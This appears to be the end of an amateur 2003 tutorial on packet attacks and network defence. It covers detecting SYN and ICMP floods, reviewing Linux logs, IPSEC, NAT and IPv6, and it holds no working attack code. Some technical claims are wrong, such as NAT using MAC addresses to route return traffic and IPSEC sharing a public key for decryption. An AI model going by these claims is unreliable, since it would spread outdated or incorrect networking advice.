Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
This would most likely be a SYN flood
trying to kill my web server. To stop this attack you can configure your firewall
to stop receiving packets from 1.1.1.1, The attacker may just choose another
source address when he realizes what you've done, but this gives you enough
time to prepare yourself.
Another way of detecting these attacks
is to run a packet sniffer. Download ethereal packet sniffer from www.ethereal.com
and set the filters to only pick up ICMP traffic. Ethereal doesn't have a huge
buffer to hold the captured data so when it begins to grow large, thousands
of ICMP packets. Its time to stop the capturing and examine the packets. These
logs are useful to save in order to show the authorities or your ISP, in order
to track down the attacker. A normal ping program produces an ICMP packet every
few seconds. An ICMP attack will usually flood your wire with over 5000 packets
in just under 10 seconds.
Intrusion Detection
Intrusion detection is easy as well,
as will almost always help you catch your attacker if you are smart enough about
it. On a normal linux box the most important logs are kept at /var/log and var/log/httpd
by default. The logs you should look at are 'messages', 'secure', and 'access_log'
in the HTTPD folder. These will accurately log who used what service on your
machine. Usually an attacker will delete this logs upon leaving your machine.
Thats why you should create backups and alternative places to log these files.
Make it harder for the attacker to find these files, in hopes he will give up
and you will have logged his real IP address. Lets take a look at one of these
logs from my machine.
$/var/log] pico secure
Feb 17 15:28:58 xinetd : START: telnet
pid=10008 from=10.10.10.10
The 10.10.10.10 being the attackers
IP address. This tells me exactly when he logged on my telnet daemon. By default
my RedHat 7.3 machine is set to email my ROOT account whenever my FTP or Telnet
daemon is accessed. These mails are kept in /var/mail. Lets take a look (deleting
the email headers, they are irrelevant).
$var/mail] pico root
--------------------
connections:
Service telnet:
10.10.10.10: 2 Time(s)
--------------------
This mail also logs unsuccessful attempts
at breaking your passwords. If a brute force program is used to break in your
log file may become to large to read. So it is imperative you read these logs
daily and sift through them for possible attacks.
IPSEC
IPSEC is a protocol that encrypts packet
headers and data. IPSEC works by exchanging packets on the IP layer. It supports
two types of encryption, tunnel and transport. The tunnel mode encrypts both
the data and the IP header. Where as the transport mode only encrypts the data
of the packet. IPSEC was designed to implement VPN's. The sender and receiver
of the packets both share a public key to decrypt the packets. IPSEC ensures
the validity of your data, and that even if sniffed, it is worthless to the
attacker. For more on IPSEC please visit this page http://www.netbsd.org/Documentation/network/ipsec/
NAT as a means of security
This next part is copied from my tutorial
on NAT. I think NAT plays a substantial part in our networks security and I
have decided to add my other work on NAT to this paper.
user1----------
200.200.200.1
user2-------------------|NAT|
200.200.200.2 --/ / |server|
/ 100.10.2.3
/
user3-----------/
200.200.200.3
Now lets pretend the 100.10.2.3 address
is a valid internet address on the backbone of the network. The three users
are using 3 DHCP assigned addresses. They would not be valid IP's on the internet.
But their packets go through the NAT router where their packet headers are stripped
and replaced with the 100.10.2.3 valid IP header. This is a vague description
of how this works. But it should give you grasp on what NAT is. Why NAT is good
for security. What is easier to defend? One point of entry? Or a thousand points
of entry? Of course one. NAT allows hundreds of machines to access the internet
via one address. At this one address it is much easier to construct a firewall
and keep out intruders from seeing your internal network. At this one access
point we can setup different protocols allowing our outside employees to reach
the internal network with the proper authentication. This doesn't have to be
done on each internal machine because there is only one entry point instead
of thousands. How do exiting packets return to their source? Easy, the NAT router
does not strip the MAC address from the packets. So when user1 sends an ICMP
echo request to lets say yahoo.com. NAT strips the 200.200.200.1 IP address
but does not strip the MAC (media access control) hex number from the packet.
So when the packet is returned the NAT router can check its ARP (address resolution
protocol) table and send the packet to the right internal machine.
This brings us to the web security
of NAT. Most webpages uses dynamic databases now using java or CGI script. They
must be connected to some sort of database within the internal network where
the average websurfer can't reach. But how are his packets supposed to reach
that data? NAT takes the incoming packets and reads their destination port.
Once the packet is inside the firewall NAT uses port forwarding and forwards
the packet to the specific internal machine containing the database. As the
packet exits the firewall on its way back to the user it is rewritten again
to look like the firewall sent it. So you can see how NAT can help secure your
webserver.
NAT can also provide load balancing
for webservers. Lets say you have a very busy webserver. You get hits from all
over the country every few seconds. These packets are beginning to slow down
the time in which your server can respond. Well using NAT we can forward certain
packets to mirror servers, thus making the load on the main server substantially
smaller. NAT can separate these packets by shortest amount of hops they have
to travel to return to their source and forward them to the appropriate mirror
site. These mirror sites can be physically located throughout the country. All
of this is done in seconds, the user never notices the new route their packet
took.
So there is how NAT can play a very
important role in your networks security. However NAT is just one of many protocols
that can offer more security, NAT is however used in all operating systems and
networks.
The Future of TCP/IP
This chapter
could be 50 pages long or it could be one paragraph, but we will keep it short.
TCP/IP was not designed to be a very secure means of transporting data. It is
easily manipulated and exploited for every attackers advantage. Pherhaps IPv6
will bring more secure protocols with advanced methods of transporting data
and routing. In the past people have suggested large centers in which data should
be stored, encrypted, and then sent back out again. But this is against the
internets original design, this creates a central point. This just opens doors
to all new types of attacks and loss of data. If an attacker were to breach
the security of these 'data' centers, the damages would be catastrophic. It
is certain by this point that IPv6 will co-exist with IPv4 for a time. IPv6
will allow many more hosts to join the internet, and hopefully a great deal
of new secure protocols for us to use and study.
Lets take for example the TCP protocol.
Its imperative for the internet to transfer data. Yet its so easily manipulated.
Now the average end user usually does not have the knowledge to manipulate it
and cause damage. This is what has kept the internet to stable (I believe) over
the past 30 years of its brief history. However these days we see more and more
crackers releasing programs that craft these attacks so easily for the average
end user.
Insert Victim, Click Here
... sending 21487298174157815 SYN packets
to the victim...
Wow that took an enormous amount of
skill? ...Right. So you can see how easy it is for script kiddies to launch
these attacks with the current set of tools manipulating IPv4 protocols.
I would like to suggest a link on IPv6,
http://www.ipv6.org/specs.html it is full of information and changes in IPv6.
Well that's it for my paper 'Packet
Attacks'. Whether your getting ready to email me with a flame or question, I
sincerely hoped you enjoyed this paper, as I have enjoyed writing it. Look forward
to many more projects and papers by me. Thanks again for reading.
Dreifachx
|